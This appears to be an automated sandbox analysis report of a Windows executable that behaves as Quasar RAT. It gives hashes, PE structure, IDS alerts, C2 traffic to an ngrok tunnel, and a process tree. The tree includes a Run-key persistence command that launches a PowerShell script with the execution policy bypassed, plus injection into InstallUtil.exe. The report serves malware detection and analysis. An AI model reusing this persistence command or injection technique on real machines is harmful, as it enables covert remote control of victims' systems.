SHA-512:	AC65D20F983106CBB8DDABBA28D48E556B5325FEE351AC43342703379D9BD43E4DB267C0746F77DBA3E9F3A6142DA53DDEDB5F2F7125EB3722A6921C976C6BF0
Malicious:	false
Preview:	panic: runtime error: invalid memory address or nil pointer dereference.[signal 0xc0000005 code=0x0 addr=0x8 pc=0x48e183]..goroutine 1 [running]:.tap/services.ExecuteCheck({0xc00001e140?, 0x1baccd?})..C:/Users/Mister/Documents/Dev/Checkers/Tap - Golang/services/hwidController.go:157 +0x63.main.startChecker()..C:/Users/Mister/Documents/Dev/Checkers/Tap - Golang/main.go:558 +0x11c.main.main()..C:/Users/Mister/Documents/Dev/Checkers/Tap - Golang/main.go:610 +0xf.

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.6103462178019665
Encrypted:	false
SSDEEP:	12:PR45pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:JKdUOAokItULVDv
MD5:	7F48CA448373AA5F29388ECD8774273A
SHA1:	752382BEB77E9571198056440BC31E38794E742B
SHA-256:	45C2AAF408A9D5F26552732E3B911AB00D2D579736FA6F18E6B3DA7563F722A7
SHA-512:	4A18F00254BA4958EC3D4ED81B4E8CA87DE73F84FAF70EBFA639D051AD79C7C48AD4A12C702A18047D3DC2D9105BAAC562E5B9857CA5CFED32E335CF061533A7
Malicious:	false
Preview:	..Pinging 878411 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.926297122794392
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	full.exe
File size:	17'277'440 bytes
MD5:	b59ee68c7c3ee01e14a7516628368046
SHA1:	7a0cc3f080d1c2143e770d1fd50dc7f20bef9f7a
SHA256:	e32128f875d42818741d274d447aacf2cdc15cc78a2ce0a393d629c4c90c779d
SHA512:	3bfeb88f787da0784e3615d9b048589cfdc3492dcb24b8a508f6fb2d6170049b86049f0942e19041b5d262cde3479d338aa5fd6ce654c6a02b6b78590c738c6b
SSDEEP:	196608:NKuXJJx9MbelAUHXTuj4KxT931ugenDTYe6cZK3F:cuXXx91WgDKd93renDTYz2K
TLSH:	2E077D47EC5105E9C9AD9630C6AA8353BB757C484B3267D72B60F2382F77BE05AB9340
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........H...B...."......FV..........~........@...........................................`... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x477e00
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	d42595b695fc008ef2c56aabd8efd68e

Entrypoint Preview

Instruction
jmp 00007FBB887D9BC0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
dec eax
mov ebp, esp
pushfd
cld
dec eax
sub esp, 000000E0h
dec eax
mov dword ptr [esp], edi
dec eax
mov dword ptr [esp+08h], esi
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], ebx
dec esp
mov dword ptr [esp+20h], esp
dec esp
mov dword ptr [esp+28h], ebp
dec esp
mov dword ptr [esp+30h], esi
dec esp
mov dword ptr [esp+38h], edi
movups dqword ptr [esp+40h], xmm6
movups dqword ptr [esp+50h], xmm7
inc esp
movups dqword ptr [esp+60h], xmm0
inc esp
movups dqword ptr [esp+70h], xmm1
inc esp
movups dqword ptr [esp+00000080h], xmm2
inc esp
movups dqword ptr [esp+00000090h], xmm3
inc esp
movups dqword ptr [esp+000000A0h], xmm4
inc esp
movups dqword ptr [esp+000000B0h], xmm5
inc esp
movups dqword ptr [esp+000000C0h], xmm6
inc esp
movups dqword ptr [esp+000000D0h], xmm7
inc ebp
xorps xmm7, xmm7
dec ebp
xor esi, esi
dec eax
mov eax, dword ptr [00B15502h]
dec eax
mov eax, dword ptr [eax]
dec eax
cmp eax, 00000000h
je 00007FBB887DD4A5h
dec esp
mov esi, dword ptr [eax]
dec eax
sub esp, 10h
dec eax
mov eax, ecx
dec eax
mov ebx, edx
call 00007FBB887E511Bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfc9000	0x53e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xb98000	0x2016c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfca000	0x182b0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa94ac0	0x178	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x564457	0x564600	59ebf4d6632ac41ec47120cd9bab7069	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x566000	0x52d3d0	0x52d400	5c0d34c566e3294687287ccfc786202b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa94000	0x103878	0xae200	8293285e8b7b6fe325d9afa623fe5f5b	False	0.36880271895190236	data	5.704517151264934	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xb98000	0x2016c	0x20200	37651710ea6c8a12e2ac7c0e3c0afc52	False	0.4023285505836576	data	5.618578282721329	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0xbb9000	0xb4	0x200	205f842001ec7911332521c3bc6919ac	False	0.2265625	data	1.783206012798912	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
/4	0xbba000	0x14c	0x200	aaf28638a5fca2ae9b61c2d0ecb5c6e7	False	0.697265625	data	5.610479515469117	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19	0xbbb000	0xd9fc5	0xda000	290dba349d2fc926f87be3c5cd5214b6	False	1.0002911768922018	data	7.9969101062011205	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/32	0xc95000	0x3249a	0x32600	99e96e7760b735a7f433be53c53fd0fb	False	0.9949742168114144	data	7.935984743009978	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/46	0xcc8000	0x30	0x200	40cca7c46fc713b4f088e5d440ca7931	False	0.103515625	data	0.8556848540171443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/65	0xcc9000	0x199d8d	0x199e00	ada5de2453a020c10cfcc79dca4c2ff5	False	0.9996467816026228	data	7.998336691421299	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/78	0xe63000	0x115c97	0x115e00	95c07d3898507b6a9a812a07afa87f27	False	0.9941019666554206	data	7.9959074136303165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/90	0xf79000	0x4f1c9	0x4f200	96bed4ea04ff9e35c7e63616da677964	False	0.973146845379147	data	7.813153054319244	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0xfc9000	0x53e	0x600	fae11b7bd79e8528b3172f8d1e694bfe	False	0.376953125	OpenPGP Public Key	4.017189066074398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xfca000	0x182b0	0x18400	84080c27783ad550de422f02ec508194	False	0.20861187177835053	data	5.434229445574159	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0xfe3000	0xf58e6	0xf5a00	98132cb21e8436f39df3e8efd1ccaed1	False	0.18489483937659032	data	5.40023659595628	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-12T18:03:39.644015+0100	2027619	ET MALWARE Observed Malicious SSL Cert (Quasar CnC)	1	18.231.236.52	20545	192.168.2.9	49709	TCP
2024-12-12T18:03:39.644015+0100	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	18.231.236.52	20545	192.168.2.9	49709	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 18:03:38.052968025 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:38.172847986 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:38.172938108 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:38.179888964 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:38.299892902 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:39.517429113 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:39.517503977 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:39.517590046 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:39.522495031 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:39.644015074 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:40.006649971 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:40.059659004 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:44.344208956 CET	49711	443	192.168.2.9	108.181.61.49
Dec 12, 2024 18:03:44.344264030 CET	443	49711	108.181.61.49	192.168.2.9
Dec 12, 2024 18:03:44.344336987 CET	49711	443	192.168.2.9	108.181.61.49
Dec 12, 2024 18:03:44.345535994 CET	49711	443	192.168.2.9	108.181.61.49
Dec 12, 2024 18:03:44.345552921 CET	443	49711	108.181.61.49	192.168.2.9
Dec 12, 2024 18:03:46.774550915 CET	443	49711	108.181.61.49	192.168.2.9
Dec 12, 2024 18:03:46.774629116 CET	49711	443	192.168.2.9	108.181.61.49
Dec 12, 2024 18:03:46.778476000 CET	49711	443	192.168.2.9	108.181.61.49
Dec 12, 2024 18:03:46.778482914 CET	443	49711	108.181.61.49	192.168.2.9
Dec 12, 2024 18:03:46.778748989 CET	443	49711	108.181.61.49	192.168.2.9
Dec 12, 2024 18:03:46.825324059 CET	49711	443	192.168.2.9	108.181.61.49
Dec 12, 2024 18:03:46.870687008 CET	49711	443	192.168.2.9	108.181.61.49
Dec 12, 2024 18:03:46.911330938 CET	443	49711	108.181.61.49	192.168.2.9
Dec 12, 2024 18:03:47.487967014 CET	443	49711	108.181.61.49	192.168.2.9
Dec 12, 2024 18:03:47.488174915 CET	443	49711	108.181.61.49	192.168.2.9
Dec 12, 2024 18:03:47.488234997 CET	49711	443	192.168.2.9	108.181.61.49
Dec 12, 2024 18:03:47.563534021 CET	49711	443	192.168.2.9	108.181.61.49
Dec 12, 2024 18:03:47.832324028 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:47.952116966 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:47.952171087 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:48.071888924 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:48.458216906 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:48.684727907 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:52.856246948 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:52.862281084 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:52.982307911 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:52.982389927 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:53.102494001 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:53.170751095 CET	49709	20545	192.168.2.9	18.231.236.52
Dec 12, 2024 18:03:53.291965961 CET	20545	49709	18.231.236.52	192.168.2.9
Dec 12, 2024 18:03:53.292033911 CET	49709	20545	192.168.2.9	18.231.236.52

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 18:03:37.765110016 CET	65157	53	192.168.2.9	1.1.1.1
Dec 12, 2024 18:03:38.044831991 CET	53	65157	1.1.1.1	192.168.2.9
Dec 12, 2024 18:03:44.164659023 CET	53776	53	192.168.2.9	1.1.1.1
Dec 12, 2024 18:03:44.302007914 CET	53	53776	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 18:03:37.765110016 CET	192.168.2.9	1.1.1.1	0x6e6f	Standard query (0)	1.tcp.sa.ngrok.io	A (IP address)	IN (0x0001)	false
Dec 12, 2024 18:03:44.164659023 CET	192.168.2.9	1.1.1.1	0x8f73	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 18:03:38.044831991 CET	1.1.1.1	192.168.2.9	0x6e6f	No error (0)	1.tcp.sa.ngrok.io		18.231.236.52	A (IP address)	IN (0x0001)	false
Dec 12, 2024 18:03:44.302007914 CET	1.1.1.1	192.168.2.9	0x8f73	No error (0)	ipwho.is		108.181.61.49	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipwho.is

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49711	108.181.61.49	443	4792	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 17:03:46 UTC	150	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Host: ipwho.is Connection: Keep-Alive
2024-12-12 17:03:47 UTC	223	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 17:03:47 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2024-12-12 17:03:47 UTC	1021	IN	Data Raw: 33 66 31 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f Data Ascii: 3f1{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.189", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yo

Target ID:	0
Start time:	12:03:06
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\full.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\full.exe"
Imagebase:	0x170000
File size:	17'277'440 bytes
MD5 hash:	B59EE68C7C3EE01E14A7516628368046
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:03:07
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:03:28
Start date:	12/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f
Imagebase:	0x7ff72af90000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:03:28
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:03:34
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xe0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:03:34
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x410000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:03:34
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xa50000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:03:52
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" "
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:03:52
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:03:52
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x9b0000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:03:52
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 10 localhost
Imagebase:	0xde0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	85
Total number of Limit Nodes:	12

Executed Functions

Function 0786A620 Relevance: .7, Instructions: 709
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2043826099.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7860000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c1b10b13c58ee35410a80b03cdbc7519d5223c13ea55988583df6b43114b19a
Instruction ID: 6b26e90733e804327a62cb36aa464cc0506d1357d875f01b588a3ab1728e9fff
Opcode Fuzzy Hash: 6c1b10b13c58ee35410a80b03cdbc7519d5223c13ea55988583df6b43114b19a
Instruction Fuzzy Hash: 6C426AB4B007169FDB18CF69C49876EBBF2BF88300F148529D55AE7381DB34A841CB96

Function 0786CAC0 Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2043826099.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7860000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb40366e768a2ea9d3bef925fccf47276ac003b8f38bacd2afeda240c553289
Instruction ID: 3d812da084a65b1aa8474a8d118382ec469d8761f283f6249e9f933ae23e0c61
Opcode Fuzzy Hash: cdb40366e768a2ea9d3bef925fccf47276ac003b8f38bacd2afeda240c553289
Instruction Fuzzy Hash: 7EE1DDB17013159FEB2ADF79C4587AEB7F6AF99300F144469D186DB290CB34E901CBA1

Function 013E6518 Relevance: 6.1, APIs: 4, Instructions: 148
threadCOMMON

Download Yara Rule

